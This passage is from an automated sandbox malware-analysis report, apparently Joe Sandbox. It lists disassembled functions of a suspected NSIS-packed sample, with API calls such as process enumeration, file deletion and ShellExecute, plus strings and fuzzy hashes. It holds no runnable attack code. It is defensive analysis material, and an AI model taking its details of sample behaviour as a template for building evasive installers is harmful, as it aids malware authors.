Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

M, xrefs: 00404B43
N, xrefs: 00404C06
@, xrefs: 00404B90
, xrefs: 00404F39

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

82D, xrefs: 004046DB
@%F, xrefs: 00404674
@rD, xrefs: 00404610
A, xrefs: 00404636

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

%s: failed opening file "%s", xrefs: 00406F0C
name, xrefs: 00406FBF
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile("%s"), xrefs: 00406DBC

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
Unknown, xrefs: 004064FC
Module32NextW, xrefs: 004065DE
Process32NextW, xrefs: 004065C8
EnumProcesses, xrefs: 00406482
Module32FirstW, xrefs: 004065D3
CreateToolhelp32Snapshot, xrefs: 004065B5
Kernel32.DLL, xrefs: 0040659B
Process32FirstW, xrefs: 004065BD
PSAPI.DLL, xrefs: 00406464
GetModuleBaseNameW, xrefs: 00406494

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
